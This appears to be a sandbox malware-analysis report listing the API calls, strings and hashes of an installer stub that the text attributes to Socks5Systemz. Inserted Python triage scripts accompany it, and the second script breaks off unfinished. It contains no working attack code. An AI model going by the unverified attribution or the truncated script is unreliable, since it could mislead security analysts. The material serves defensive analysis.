• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
• API String ID: 1646373207-2130885113
APIs
• RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
• RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
• GetCurrentThreadId.KERNEL32 ref: 00430971
• GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
Similarity
• API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
• String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
• API String ID: 4130936913-2943970505
APIs
• GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
• CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
  • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
  • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
  • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
  • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
Similarity
• API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
• String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
• API String ID: 854858120-615399546
APIs
• LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
• GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
• OemToCharA.USER32(?,?), ref: 0042375C
• CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
Similarity
• API ID: Char$FileIconLoadLowerModuleName
• String ID: 2$MAINICON
• API String ID: 3935243913-3181700818
APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
• GetCurrentThreadId.KERNEL32 ref: 00418F79
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
  • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
  • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
  • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
  • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
  • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
  • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
  • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
  • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
  • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
  • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                      • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                      • API String ID: 316262546-2767913252
                                                                                                      • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                      • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                      • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                      • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                      APIs
                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$Prop
                                                                                                      • String ID:
                                                                                                      • API String ID: 3887896539-0
                                                                                                      • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                      • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                      • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                      • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                      Strings
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                      • PendingFileRenameOperations, xrefs: 00455754
                                                                                                      • WININIT.INI, xrefs: 004557E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                      • API String ID: 47109696-2199428270
                                                                                                      • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                      • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                      • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                      • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                      • API String ID: 1375471231-2952887711
                                                                                                      • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                      • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                      • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                      • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                      APIs
                                                                                                      • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                      • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                      • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnumLongWindows
                                                                                                      • String ID: \AB
                                                                                                      • API String ID: 4191631535-3948367934
                                                                                                      • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                      • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                      • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                      • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,021BC52C,00003AD0,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                      • String ID: x|
                                                                                                      • API String ID: 730355536-1195792818
                                                                                                      • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                      • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                      • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                      • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                      APIs
                                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressDeleteHandleModuleProc
                                                                                                      • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                      • API String ID: 588496660-1846899949
                                                                                                      • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                      • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                      • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                      • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                      Strings
                                                                                                      • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                      • NextButtonClick, xrefs: 0046BC4C
                                                                                                      • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                      • API String ID: 0-2329492092
                                                                                                      • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                      • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                                      • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                                      • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
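The function blocks above are the installer stub's own code rather than the Socks5Systemz payload: `_isetup`, `\_setup64.tmp`, `PrepareToInstall failed: %s` and `Need to restart Windows? %s` are Inno Setup runtime strings, `ControlOfs%.8X%.8X` / `Delphi%.8X` are Delphi VCL window atoms, and the `PendingFileRenameOperations` / `WININIT.INI` lookups are the installer's reboot-pending check. When triaging a report like this it helps to turn the listing into structured records and tag each function, so that installer plumbing (registry reads, `GetModuleHandleA` + `GetProcAddress` resolution of `RegDeleteKeyExA`) is separated from behaviour that actually belongs to the dropped payload. The following parser is an added example, not Joe Sandbox's tooling; its sample input is copied from two of the blocks above, and the rule that a block ends at its "Instruction Fuzzy Hash" line is an assumption drawn from the layout on this page.

```python
"""Parse Joe Sandbox per-function listings into records and tag them for triage.
Added example, not Joe Sandbox code.  Assumes each function block ends at its
"Instruction Fuzzy Hash" line, as in the listing this accompanies."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class ApiCall:
    api: str                           # e.g. RegOpenKeyExA
    module: str                        # e.g. ADVAPI32
    args: list[str]                    # argument column as the report prints it
    ref: str                           # call-site address
    subcall_of: Optional[str] = None   # set for "Part of subcall function X" lines

@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (string, xref)
    api_id: str = ""
    fuzzy_hash: str = ""

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^(?P<s>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}

# Sample input: lines copied from two function blocks of the report above
# (the Session Manager registry check and the RegDeleteKeyExA resolver).
SAMPLE = """\
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\\CurrentControlSet\\Control\\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
Strings
• PendingFileRenameOperations2, xrefs: 00455784
• SYSTEM\\CurrentControlSet\\Control\\Session Manager, xrefs: 00455738
• PendingFileRenameOperations, xrefs: 00455754
• WININIT.INI, xrefs: 004557E4
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpen
• API String ID: 47109696-2199428270
• Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
Strings
Memory Dump Source
Similarity
• API ID: AddressDeleteHandleModuleProc
• Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
"""

def parse_blocks(text: str) -> list[FunctionBlock]:
    """Walk the listing line by line, tracking which section we are in."""
    blocks: list[FunctionBlock] = []
    cur, section = FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("•"):
            line = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["api"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
        elif section == "Strings":
            m = STR_RE.match(line)
            if m:
                cur.strings.append((m["s"], m["ref"]))
        elif section == "Similarity":
            if line.startswith("API ID:"):
                cur.api_id = line[len("API ID:"):].strip()
            elif line.startswith("Instruction Fuzzy Hash:"):
                cur.fuzzy_hash = line.split(":", 1)[1].strip()
                blocks.append(cur)            # last field of a block: close it
                cur, section = FunctionBlock(), None
    return blocks

def tag_block(b: FunctionBlock) -> set[str]:
    """Coarse behaviour labels; extend the rules to fit the report you triage."""
    tags: set[str] = set()
    names = {c.api for c in b.apis}
    if "GetProcAddress" in names and names & LOADERS:
        tags.add("dynamic_api_resolution")
    if any(c.module == "ADVAPI32" and c.api.startswith("Reg") for c in b.apis):
        tags.add("registry")
    if any(s.startswith("PendingFileRenameOperations") for s, _ in b.strings):
        tags.add("pending_reboot_check")
    return tags

def summarize(text: str) -> list[dict]:
    """One row per function: call chain in report order plus its tags."""
    return [{"fuzzy_hash": b.fuzzy_hash[:16],
             "chain": " -> ".join(c.api for c in b.apis),
             "tags": sorted(tag_block(b))} for b in parse_blocks(text)]

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row)
```

Run it over a whole saved report page and filter on the tags, or on `api_id` (the report's own keyword list for the block), to find the functions worth opening in the dump; a function tagged only `registry` / `pending_reboot_check` with Inno Setup strings is installer housekeeping, while the same tags on a function in the unpacked payload are where persistence logic would live.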
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                                      • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveChangeNotifyWindow
                                                                                                      • String ID: $Need to restart Windows? %s
                                                                                                      • API String ID: 1160245247-4200181552
                                                                                                      • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                      • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                                      • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                                      • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
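Each function record above carries the same fields: the resolved API calls with their call-site addresses, the "API ID" / "String ID" summary, an "API String ID" that is a pair of hashes ("apihash-stringhash"), and the Opcode ID / Instruction ID used for cross-sample similarity. The following Python, an added example that is not part of the Joe Sandbox report or its IDA plugin, parses such records into structured form so the hashes can be pivoted on: it groups records that share a string hash (the two "%H" records in this section share 1959103961) and pulls out the names passed to GetProcAddress, which is the concrete evidence behind the "dynamically determine API calls" signature. The sample text is constructed from three abbreviated records copied from this page; the field layout of the regular expressions is an assumption drawn from those records only.

```python
"""Parse Joe Sandbox IDA-plugin function records and pivot on their hashes.

Added example, not part of the Joe Sandbox report. The record format assumed
here is inferred from the records visible on this page.
"""
import re
from collections import defaultdict

# Constructed sample: three abbreviated records copied from the report above.
SAMPLE_REPORT = """
APIs
• GetDC.USER32(00000000), ref: 0044B401
• SelectObject.GDI32(?,00000000), ref: 0044B424
• ReleaseDC.USER32(00000000,?), ref: 0044B457
Similarity
• API ID: ObjectReleaseSelect
• String ID: %H
• API String ID: 1831053106-1959103961
• Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
• Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
APIs
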